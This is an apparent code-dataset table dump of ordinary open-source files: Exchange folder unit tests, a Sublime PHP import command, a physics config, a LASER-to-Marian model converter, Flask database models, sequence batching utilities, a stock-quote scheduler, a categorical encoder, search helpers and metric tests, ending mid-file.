max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
tests/exchange2010/test_get_folder.py | tedeler/pyexchange | 128 | 12652204 | """
(c) 2013 LinkedIn Corp. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
"""
import unittest
import httpretty
from pytest import raises
from pyexchange import Exchange2010Service
from pyexchange.connection import ExchangeNTLMAuthConnection
from pyexchange.exceptions import *
from .fixtures import *
class Test_ParseFolderResponseData(unittest.TestCase):
folder = None
@classmethod
def setUpClass(cls):
@httpretty.activate # this decorator doesn't play nice with @classmethod
def fake_folder_request():
service = Exchange2010Service(
connection=ExchangeNTLMAuthConnection(
url=FAKE_EXCHANGE_URL,
username=FAKE_EXCHANGE_USERNAME,
password=FAKE_EXCHANGE_PASSWORD,
)
)
httpretty.register_uri(
httpretty.POST,
FAKE_EXCHANGE_URL,
body=GET_FOLDER_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
return service.folder().get_folder(id=TEST_FOLDER.id)
cls.folder = fake_folder_request()
def test_canary(self):
assert self.folder is not None
def test_folder_id_was_not_changed(self):
assert self.folder.id == TEST_FOLDER.id
def test_folder_has_a_name(self):
assert self.folder.display_name == TEST_FOLDER.display_name
def test_folder_has_a_parent(self):
assert self.folder.parent_id == TEST_FOLDER.parent_id
def test_folder_type(self):
assert self.folder.folder_type == TEST_FOLDER.folder_type
class Test_FailingToGetFolders(unittest.TestCase):
service = None
@classmethod
def setUpClass(cls):
cls.service = Exchange2010Service(
connection=ExchangeNTLMAuthConnection(
url=FAKE_EXCHANGE_URL,
username=FAKE_EXCHANGE_USERNAME,
password=FAKE_EXCHANGE_PASSWORD
)
)
@httpretty.activate
def test_requesting_a_folder_id_that_does_not_exist_throws_exception(self):
httpretty.register_uri(
httpretty.POST, FAKE_EXCHANGE_URL,
body=FOLDER_DOES_NOT_EXIST.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
with raises(ExchangeItemNotFoundException):
self.service.folder().get_folder(id=TEST_FOLDER.id)
@httpretty.activate
def test_requesting_a_folder_and_getting_a_500_response_throws_exception(self):
httpretty.register_uri(
httpretty.POST,
FAKE_EXCHANGE_URL,
body=u"",
status=500,
content_type='text/xml; charset=utf-8',
)
with raises(FailedExchangeException):
self.service.folder().get_folder(id=TEST_FOLDER.id)
|
php_companion/commands/import_use_command.py | risingphoenix/SublimePHPCompanion | 979 | 12652206 | import sublime
import sublime_plugin
from ..settings import get_setting
class ImportUseCommand(sublime_plugin.TextCommand):
def run(self, edit, namespace):
self.namespace = namespace
if self.is_already_used():
return self.view.show_popup('Use already exists!',
flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
self.insert_use(edit)
def insert_use(self, edit):
if self.is_first_use():
for location in [r"^\s*namespace\s+[\w\\]+[;{]", r"<\?php"]:
inserted = self.insert_first_use(location, edit)
if inserted:
break
else:
self.insert_use_among_others(edit)
def insert_first_use(self, where, edit):
region = self.view.find(where, 0)
if not region.empty():
line = self.view.line(region)
self.view.insert(edit, line.end(), "\n\n" + self.build_uses())
self.view.show_popup('Successfully imported ' + self.namespace,
flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
return True
return False
def insert_use_among_others(self, edit):
regions = self.view.find_all(r"^(use\s+.+[;])", 0)
if len(regions) > 0:
region = regions[0]
for r in regions:
region = region.cover(r)
self.view.replace(edit, region, self.build_uses())
self.view.show_popup('Successfully imported ' + self.namespace,
flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
def build_uses(self):
uses = []
use_stmt = "use " + self.namespace + ";"
self.view.find_all(r"^(use\s+.+[;])", 0, '$1', uses)
uses.append(use_stmt)
uses = list(set(uses))
uses.sort()
if get_setting("use_sort_length"):
uses.sort(key = len)
return "\n".join(uses)
def is_already_used(self):
region = self.view.find(("use " + self.namespace + ";").replace('\\', '\\\\'), 0)
return not region.empty()
def is_first_use(self):
return len(self.view.find_all(r"^(use\s+.+[;])", 0)) == 0
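# Usage sketch (not part of the original plugin): Sublime Text derives the command
# name "import_use" from the ImportUseCommand class name, so another plugin or the
# console could invoke it roughly like this (the namespace value is a made-up example):
#   view.run_command('import_use', {'namespace': 'App\\Models\\User'})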
|
Validation/RecoVertex/test/demoProducePrimaryVertex_cfg.py | ckamtsikis/cmssw | 852 | 12652216 | import FWCore.ParameterSet.Config as cms
process = cms.Process("DempProduce")
#keep the logging output to a nice level
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.MagneticField_38T_cff")
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.GlobalTag.globaltag= "START3X_V25B::All"
process.load("Configuration.EventContent.EventContent_cff")
extendAOD = cms.untracked.vstring(
'drop *',
'keep *_source_*_*',
'keep *_VtxSmeared_*_*',
'keep SimTracks_g4SimHits_*_*',
'keep SimVertexs_g4SimHits_*_*',
'keep *_offlinePrimaryVertices_*_Demo',
'keep recoTracks_generalTracks_*_*')
process.AODSIMEventContent.outputCommands.extend(extendAOD)
process.out = cms.OutputModule("PoolOutputModule",
outputCommands = process.AODSIMEventContent.outputCommands,
fileName = cms.untracked.string('reco.root')
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('/store/mc/Spring10/MinBias/GEN-SIM-RECO/START3X_V25B_356ReReco-v1/0004/0E72CE54-F43B-DF11-A06F-0026189438BD.root')
)
process.load("RecoVertex.Configuration.RecoVertex_cff")
process.dump = cms.EDAnalyzer("EventContentAnalyzer")
process.Tracer = cms.Service("Tracer",
indention = cms.untracked.string('$$')
)
process.p = cms.Path(process.vertexreco)
process.outpath = cms.EndPath(process.out)
|
scripts/laser/laser2marian.py | delong-coder/marian-dev | 829 | 12652229 | import numpy as np
import sys
import yaml
import argparse
import torch
parser = argparse.ArgumentParser(description='Convert LASER model to Marian weight file.')
parser.add_argument('--laser', help='Path to LASER PyTorch model', required=True)
parser.add_argument('--marian', help='Output path for Marian weight file', required=True)
args = parser.parse_args()
laser = torch.load(args.laser)
config = dict()
config["type"] = "laser"
config["input-types"] = ["sequence"]
config["dim-vocabs"] = [laser["params"]["num_embeddings"]]
config["version"] = "laser2marian.py conversion"
config["enc-depth"] = laser["params"]["num_layers"]
config["enc-cell"] = "lstm"
config["dim-emb"] = laser["params"]["embed_dim"]
config["dim-rnn"] = laser["params"]["hidden_size"]
yaml.dump(laser["dictionary"], open(args.marian + ".vocab.yml", "w"))
marianModel = dict()
def transposeOrder(mat):
matT = np.transpose(mat) # just a view with changed row order
return matT.flatten(order="C").reshape(matT.shape) # force row order change and reshape
def convert(pd, srcs, trg, transpose=True, bias=False, lstm=False):
num = pd[srcs[0]].detach().numpy()
for i in range(1, len(srcs)):
num += pd[srcs[i]].detach().numpy()
out = num
if bias:
num = np.atleast_2d(num)
else:
if transpose:
num = transposeOrder(num) # transpose with row order change
if lstm: # different order in pytorch than marian
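# Note (added for clarity): PyTorch packs the four LSTM gate blocks in
# (input, forget, cell, output) order; the swap below moves the forget block
# first, presumably because Marian expects (forget, input, cell, output).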
stateDim = int(num.shape[-1] / 4)
i = np.copy(num[:, 0*stateDim:1*stateDim])
f = np.copy(num[:, 1*stateDim:2*stateDim])
num[:, 0*stateDim:1*stateDim] = f
num[:, 1*stateDim:2*stateDim] = i
marianModel[trg] = num
for k in laser:
print(k)
for k in laser["model"]:
print(k, laser["model"][k].shape)
convert(laser["model"], ["embed_tokens.weight"], "encoder_Wemb", transpose=False)
for i in range(laser["params"]["num_layers"]):
convert(laser["model"], [f"lstm.weight_ih_l{i}"], f"encoder_lstm_l{i}_W", lstm=True)
convert(laser["model"], [f"lstm.weight_hh_l{i}"], f"encoder_lstm_l{i}_U", lstm=True)
convert(laser["model"], [f"lstm.bias_ih_l{i}", f"lstm.bias_hh_l{i}"], f"encoder_lstm_l{i}_b", bias=True, lstm=True) # needs to be summed!
convert(laser["model"], [f"lstm.weight_ih_l{i}_reverse"], f"encoder_lstm_l{i}_reverse_W", lstm=True)
convert(laser["model"], [f"lstm.weight_hh_l{i}_reverse"], f"encoder_lstm_l{i}_reverse_U", lstm=True)
convert(laser["model"], [f"lstm.bias_ih_l{i}_reverse", f"lstm.bias_hh_l{i}_reverse"], f"encoder_lstm_l{i}_reverse_b", bias=True, lstm=True) # needs to be summed!
for m in marianModel:
print(m, marianModel[m].shape)
configYamlStr = yaml.dump(config, default_flow_style=False)
desc = list(configYamlStr)
npDesc = np.chararray((len(desc),))
npDesc[:] = desc
npDesc.dtype = np.int8
marianModel["special:model.yml"] = npDesc
print("\nMarian config:")
print(configYamlStr)
print("Saving Marian model to %s" % (args.marian,))
np.savez(args.marian, **marianModel) |
Flask/models.py | Zhgx/bili | 166 | 12652264 | # pip install flask-sqlalchemy
from flask_sqlalchemy import SQLAlchemy
from flask import Flask
app = Flask(__name__)
# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:[email protected]:3306/test'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + "/home/lmp/test.db"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'xxx'
db = SQLAlchemy(app)
# Student table
class Student(db.Model):
__tablename__ = "student"
id = db.Column(db.Integer, primary_key=True) # id (unique)
name = db.Column(db.String(64), nullable=False) # student name
gender = db.Column(db.Enum("男", "女"), nullable=False) # student gender
phone = db.Column(db.String(11), unique=True, nullable=False) # student phone number
courses = db.relationship("Course", secondary="student_course", backref="students") # many-to-many relationship to courses
grades = db.relationship("Grade", backref="student") # relationship to grades
# Student-course association (junction) table
class StudentCourse(db.Model):
__tablename__ = "student_course"
id = db.Column(db.Integer, primary_key=True) # id (unique)
students_id = db.Column(db.Integer, db.ForeignKey("student.id")) # student id
courses_id = db.Column(db.Integer, db.ForeignKey("course.id")) # course id
# Course table
class Course(db.Model):
__tablename__ = "course"
id = db.Column(db.Integer, primary_key=True) # id (unique)
name = db.Column(db.String(32), unique=True) # course name
teacher_id = db.Column(db.Integer, db.ForeignKey("teacher.id")) # id of the teacher who owns this course
grades = db.relationship("Grade", backref="course") # relationship to grades
# Teacher table
class Teacher(db.Model):
__tablename__ = "teacher"
id = db.Column(db.Integer, primary_key=True) # id (unique)
name = db.Column(db.String(32), unique=True) # name
phone = db.Column(db.String(11), unique=True, nullable=False) # phone number
gender = db.Column(db.Enum("男", "女"), nullable=False) # gender
course = db.relationship("Course", backref="teacher") # courses taught
# Grade table
class Grade(db.Model):
__tablename__ = "grade"
id = db.Column(db.Integer, primary_key=True) # id (unique)
my_grade = db.Column(db.String(32), unique=True) # score
course_id = db.Column(db.Integer, db.ForeignKey("course.id")) # course this grade belongs to
students_id = db.Column(db.Integer, db.ForeignKey("student.id")) # student this grade belongs to
if __name__ == "__main__":
db.create_all()
# db.drop_all()
|
seq2seq/tools/__init__.py | eladhoffer/seq2seq.pytorch | 587 | 12652266 |
import torch
from random import randrange
from math import floor
from torch.nn.utils.rnn import pack_padded_sequence, PackedSequence
from .config import PAD
def _limit_lengths(seqs, max_length=None, max_tokens=None):
max_length = max_length or float('inf')
lengths = [min(s.nelement(), max_length) for s in seqs]
if max_tokens is not None:
num_tokens = sum(lengths)
if num_tokens > max_tokens:
max_length = int(floor(num_tokens / len(seqs)))
lengths = [min(length, max_length) for length in lengths]
return lengths
# def _limit_batch_tokens(seqs, max_length=None, max_tokens=None, log=False):
# """
# seqs: a list of Tensors to be batched together
# max_length: maximum sequence length permitted
# max_tokens: maximum number of tokens (with padding) permitted -- batch will be trimed if exceeded
# """
# max_length = max_length or float('inf')
# lengths = [min(s.nelement(), max_length) for s in seqs]
# if max_tokens is not None:
# num_tokens = max(lengths) * len(seqs)
# if num_tokens > max_tokens: # needs to restrict batch size to fit maximum tokens
# # account for padding in final tensor
# padded_lengths = np.maximum.accumulate(lengths)
# num_tokens_batch = padded_lengths * (np.arange(len(seqs)) + 1)
# # determine new batch size and trim sequence
# B = int((num_tokens_batch > max_tokens).argmax() - 1)
# seqs = seqs[:B]
# lengths = lengths[:B]
# if log:
# logging.debug('Trimmed batch to %s as number of tokens was > %s'
# % (B, max_tokens))
# return seqs, lengths
def batch_sequences(seqs, max_length=None, max_tokens=None, fixed_length=None, batch_first=False, pad_value=PAD,
sort=False, pack=False, augment=False, device=None, dtype=torch.long):
"""
seqs: a list of Tensors to be batched together
max_length: maximum sequence length permitted
max_tokens: maximum number of tokens in batch permitted
"""
batch_dim, time_dim = (0, 1) if batch_first else (1, 0)
if fixed_length is not None:
fixed_length = max_length = min(max_length, fixed_length)
if len(seqs) == 1 and not fixed_length:
lengths = _limit_lengths(seqs, max_length, max_tokens)
seq_tensor = seqs[0].view(-1,)[:lengths[0]]
seq_tensor = seq_tensor.unsqueeze(batch_dim)\
.to(dtype=dtype, device=device)
else:
if sort:
seqs.sort(key=len, reverse=True)
lengths = _limit_lengths(seqs, max_length, max_tokens)
batch_length = max(lengths) if fixed_length is None\
else fixed_length
tensor_size = (len(seqs), batch_length) if batch_first \
else (batch_length, len(seqs))
seq_tensor = torch.full(tensor_size, pad_value,
dtype=dtype, device=device)
for i, seq in enumerate(seqs):
start_seq = 0
end_seq = lengths[i]
if augment and end_seq < seq.nelement():
delta = randrange(seq.nelement() - end_seq + 1)
start_seq += delta
end_seq += delta
seq_tensor.narrow(time_dim, 0, lengths[i]).select(batch_dim, i)\
.copy_(seq[start_seq:end_seq])
if pack:
seq_tensor = pack_padded_sequence(
seq_tensor, lengths, batch_first=batch_first)
if device is not None: # batch_sizes is not casted to device by default
seq_tensor = PackedSequence(seq_tensor.data,
seq_tensor.batch_sizes.to(device))
return (seq_tensor, lengths)
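# Usage sketch (hypothetical tensors, not from the original code base):
#   seqs = [torch.tensor([1, 2, 3]), torch.tensor([4, 5]), torch.tensor([6])]
#   padded, lengths = batch_sequences(seqs, batch_first=True)
#   # padded has shape (3, 3) with PAD filling the short rows; lengths == [3, 2, 1]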
def batch_nested_sequences(seqs_subseqs, max_length=None, max_tokens=None, fixed_length=None, batch_first=True, pad_value=PAD,
augment=False, device=None, dtype=torch.long):
"""
seqs: a list of Tensors to be batched together
sub_seqs: a list of list of Tensors to be batched together
max_length: maximum sequence length permitted
max_tokens: maximum number of tokens in batch permitted
"""
seqs, sub_seqs = zip(*seqs_subseqs)
batch_dim, time_dim = (0, 1) if batch_first else (1, 0)
if fixed_length is not None:
fixed_length = max_length = min(max_length, fixed_length)
lengths = _limit_lengths(seqs, max_length, max_tokens)
sub_seqs = [s[:length] for s, length in zip(sub_seqs, lengths)]
sub_lengths = [[sub.nelement() for sub in s] for s in sub_seqs]
batch_length = max(lengths) if fixed_length is None\
else fixed_length
batch_sub_length = max([max([s2.numel() for s2 in s1]) for s1 in sub_seqs])
sub_tensor_size = (len(seqs), batch_length, batch_sub_length) if batch_first \
else (batch_length, batch_sub_length, len(seqs))
sub_seq_tensor = torch.full(sub_tensor_size, pad_value,
dtype=dtype, device=device)
tensor_size = (len(seqs), batch_length) if batch_first \
else (batch_length, len(seqs))
seq_tensor = torch.full(tensor_size, pad_value,
dtype=dtype, device=device)
for i, seq in enumerate(seqs):
end_seq = lengths[i]
seq_tensor.narrow(time_dim, 0, lengths[i]).select(batch_dim, i)\
.copy_(seq[0:end_seq])
for j, sub_seq in enumerate(sub_seqs[i]):
end_sub_seq = sub_lengths[i][j]
sub_seq_tensor\
.narrow(time_dim+1, 0, end_sub_seq)\
.select(time_dim, j)\
.select(batch_dim, i)\
.copy_(sub_seq[0:end_sub_seq])
return (seq_tensor, lengths), (sub_seq_tensor, sub_lengths)
|
fooltrader/sched/sched_china_stock_quote.py | beaquant/fooltrader | 1,103 | 12652268 | # -*- coding: utf-8 -*-
import logging
from apscheduler.schedulers.background import BackgroundScheduler
from fooltrader.connector import es_connector
from fooltrader.datamanager.china_stock_manager import crawl_stock_quote, crawl_index_quote
from fooltrader.settings import STOCK_START_CODE, STOCK_END_CODE
from fooltrader.utils.utils import init_process_log
init_process_log('crawling_china_stock_quote.log')
logger = logging.getLogger(__name__)
sched = BackgroundScheduler()
@sched.scheduled_job('cron', hour=17, minute=00)
def scheduled_job1():
crawl_stock_quote(STOCK_START_CODE, STOCK_END_CODE)
es_connector.kdata_to_es(STOCK_START_CODE, STOCK_END_CODE)
@sched.scheduled_job('cron', hour=18, minute=00)
def scheduled_job2():
crawl_index_quote()
es_connector.kdata_to_es(security_type='index')
if __name__ == '__main__':
logger.info("start crawling stock china stock quote")
crawl_stock_quote(STOCK_START_CODE, STOCK_END_CODE)
crawl_index_quote()
logger.info("shed crawling china stock quote")
sched.start()
logger.info("I would crawl china stock quote at 17:00 everyday")
sched._thread.join()
|
src/mylib/sklearn/fe/pair_count_encoder.py | murez/mobile-semantic-segmentation | 713 | 12652323 | import pandas as pd
from sklearn.base import TransformerMixin
from sklearn.decomposition import TruncatedSVD
import numpy as np
# https://www.kaggle.com/matleonard/categorical-encodings
class PairCountEncoder(TransformerMixin):
def __init__(self, n_components=3, seed=123):
self.svd = TruncatedSVD(n_components=n_components, random_state=seed)
self.svd_encoding = None
def fit(self, X, y=None):
df = pd.concat((
pd.DataFrame(X.values, columns=['main', 'sub']),
pd.DataFrame(np.ones(len(X)), columns=['y'])
), axis=1)
pair_counts = df.groupby(['main', 'sub'])['y'].count()
mat = pair_counts.unstack(fill_value=0)
self.svd_encoding = pd.DataFrame(self.svd.fit_transform(mat), index=mat.index)
return self
def transform(self, X, y=None):
return self.svd_encoding.reindex(X.values[:, 0]).values
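# Usage sketch (column names are illustrative only): encode how often each
# ('main', 'sub') category pair co-occurs, compressed to 3 SVD components.
#   enc = PairCountEncoder(n_components=3)
#   pair_features = enc.fit(df[['main_cat', 'sub_cat']]).transform(df[['main_cat', 'sub_cat']])
#   # pair_features has shape (len(df), 3), indexed by each row's 'main_cat' value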
|
search/utils.py | IAmPara0x/yuno | 349 | 12652337 | from typing import (Callable, Optional, List, TypeVar, Tuple, Dict, Union)
from cytoolz.curried import ( # type: ignore
curry, compose, flip, nth, concat, itemmap, groupby, filter)
from returns.maybe import Maybe, Nothing
import numpy as np
import torch
from .config import Config
from .base import Data
A = TypeVar("A")
Result = List[Tuple[Data, float]]
Tensor = torch.Tensor
getattr = compose(curry, flip)(getattr)
fst = nth(0)
snd = nth(1)
def sigmoid(x: np.ndarray) -> np.ndarray:
return 1 / (1 + np.exp(-x))
def get_config(config: Optional[Config], default_cfg: A, name: str) -> A:
m_cfg: Maybe[A] = Maybe.from_optional(config).bind_optional(
lambda cfg: getattr(name, cfg))
if m_cfg == Nothing:
cfg = default_cfg
else:
cfg = m_cfg.unwrap()
return cfg
def datas_filter(pred: Callable[[Data], bool],
datas: List[Data]) -> List[Data]:
return compose(list, filter(pred))(datas)
def group_data(attr: str, datas: List[Data],
scores: np.ndarray) -> Dict[A, Result]:
return groupby(compose(getattr(attr), fst), zip(datas, scores))
def ungroup_data(fn, grp_datas):
datas, scores = map(list, zip(*concat(itemmap(fn, grp_datas).values(), )))
return datas, scores
def pair_sim(mat1: Tensor, mat2: Tensor) -> Tensor:
return torch.cosine_similarity(mat1.unsqueeze(1), mat2, dim=-1)
def from_vstack(mat: Union[np.ndarray, List[np.ndarray]]) -> Tensor:
return compose(torch.from_numpy, np.vstack)(mat)
def l2_approx(x: Tensor, mat: Tensor, mat_t: Tensor) -> Tensor:
return torch.inverse(mat_t @ mat) @ mat_t @ x
def rescale_scores(
t_min: float = 1,
t_max: float = 2,
inverse: bool = False) -> Callable[[np.ndarray], np.ndarray]:
def dispatch(scores: np.ndarray) -> np.ndarray:
r_min, r_max = min(scores), max(scores)
if inverse:
scaled_scores = (r_min - scores) / (r_max - r_min)
return scaled_scores * (t_max - t_min) + t_max
else:
scaled_scores = (scores - r_min) / (r_max - r_min)
return scaled_scores * (t_max - t_min) + t_min
return dispatch
@curry
def cos_sim(v1: np.ndarray, v2: np.ndarray) -> np.ndarray:
return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
def top_subset_sum(arr: Tensor, t: float) -> List[int]:
_, idxs = torch.sort(arr, descending=True)
for i in range(1, len(idxs) + 1):
if torch.sum(arr[idxs[:i]]) >= t:
return idxs[:i].tolist()
return idxs.tolist()
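# Example (sketch): with arr = torch.tensor([0.5, 0.3, 0.2]) and t = 0.7,
# top_subset_sum returns [0, 1] -- the indices of the largest scores whose
# cumulative sum first reaches the threshold.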
|
model_search/metric_fns_test.py | dywsjtu/model_search | 3,315 | 12652355 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# List as: python3
"""Tests for model_search.metric_fns."""
from absl.testing import parameterized
from model_search import metric_fns
import numpy as np
import tensorflow.compat.v2 as tf
class MetricFnsTest(tf.test.TestCase, parameterized.TestCase):
# pylint: disable=g-long-lambda
# tf.constant must be called in a lambda, otherwise the Op would be created
# in a different graph from where it would be used, which is not allowed.
@parameterized.named_parameters(
{
'testcase_name':
'int64_label_single_task',
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
'predictions_fn':
lambda: {
'predictions': tf.constant([1, 0, 0, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy': np.float32(0.2)
}
}, {
'testcase_name':
'string_label_single_task',
'label_vocabulary': ['A', 'B', 'C', 'D', 'E'],
'labels_fn':
lambda: tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'predictions_fn':
lambda: {
'predictions': tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy': np.float32(0.2)
}
}, {
'testcase_name':
'string_label_no_vocab_single_task',
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'predictions_fn':
lambda: {
'predictions': tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {}
}, {
'testcase_name':
'int64_label_multi_task',
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a': tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
'task_b': tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([1, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([1, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_a': np.float32(0.2),
'accuracy/task_b': np.float32(0.6),
},
}, {
'testcase_name':
'string_label_multi_task',
'label_vocabulary': {
'task_a': ['A', 'B', 'C', 'D', 'E'],
'task_b': ['F', 'G', 'H', 'I', 'J'],
},
'labels_fn':
lambda: {
'task_a':
tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'task_b':
tf.constant(['F', 'G', 'H', 'I', 'J'], dtype=tf.string),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_a': np.float32(0.2),
'accuracy/task_b': np.float32(0.2),
},
}, {
'testcase_name':
'mixed_label_multi_task',
'label_vocabulary': {
'task_a': ['A', 'B', 'C', 'D', 'E'],
},
'labels_fn':
lambda: {
'task_a':
tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'task_b':
tf.constant([1, 1, 0, 0, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_a': np.float32(0.2),
'accuracy/task_b': np.float32(0.4),
},
}, {
'testcase_name':
'string_no_vocab_multi_task',
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a':
tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'task_b':
tf.constant([1, 1, 0, 0, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_b': np.float32(0.4),
},
})
# pylint: enable=g-long-lambda
def test_make_accuracy_metric_fn(self, label_vocabulary, labels_fn,
predictions_fn, expected_metric_dict):
# Force graph mode
with tf.compat.v1.Graph().as_default():
metric_fn = metric_fns.make_accuracy_metric_fn(label_vocabulary)
actual_metric_dict = metric_fn(labels_fn(), predictions_fn())
with self.test_session() as sess:
sess.run(tf.compat.v1.initializers.local_variables())
sess.run(tf.compat.v1.initializers.tables_initializer())
actual_metric_dict_val = sess.run(actual_metric_dict)
actual_metric_dict_val_clean = {
metric_key: metric_val[1]
for metric_key, metric_val in actual_metric_dict_val.items()
}
self.assertEqual(expected_metric_dict, actual_metric_dict_val_clean)
# pylint: disable=g-long-lambda
@parameterized.named_parameters(
{
'testcase_name':
'roc_perfect',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_roc': np.float32(1.0)
}
}, {
'testcase_name':
'roc_perfect_vocab',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary': ['ZERO', 'ONE'],
'labels_fn':
lambda: tf.constant(['ONE', 'ZERO'], dtype=tf.string),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_roc': np.float32(1.0)
}
}, {
'testcase_name':
'roc_random',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.5, 0.5], [0.5, 0.5]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_roc': np.float32(0.5)
}
}, {
'testcase_name':
'pr_perfect',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_pr': np.float32(1.0)
}
}, {
'testcase_name':
'pr_perfect_vocab',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary': ['ZERO', 'ONE'],
'labels_fn':
lambda: tf.constant(['ONE', 'ZERO'], dtype=tf.string),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_pr': np.float32(1.0)
}
}, {
'testcase_name':
'pr_random',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.5, 0.5], [0.5, 0.5]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_pr': np.float32(0.5)
}
})
# pylint: enable=g-long-lambda
def test_auc_metric_fn(self, metric_fn_factory, label_vocabulary, labels_fn,
predictions_fn, expected_metric_dict):
# Force graph mode
with tf.compat.v1.Graph().as_default():
metric_fn = metric_fn_factory(label_vocabulary)
actual_metric_dict = metric_fn(labels_fn(), predictions_fn())
with self.test_session() as sess:
sess.run(tf.compat.v1.initializers.local_variables())
sess.run(tf.compat.v1.initializers.tables_initializer())
actual_metric_dict_val = sess.run(actual_metric_dict)
actual_metric_dict_val_clean = {
metric_key: metric_val[1]
for metric_key, metric_val in actual_metric_dict_val.items()
}
self.assertAllClose(expected_metric_dict, actual_metric_dict_val_clean)
# pylint: disable=g-long-lambda
@parameterized.named_parameters(
{
'testcase_name':
'roc_multi_task',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a': tf.constant([1, 0], dtype=tf.int64),
'task_b': tf.constant([1, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_a':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_b':
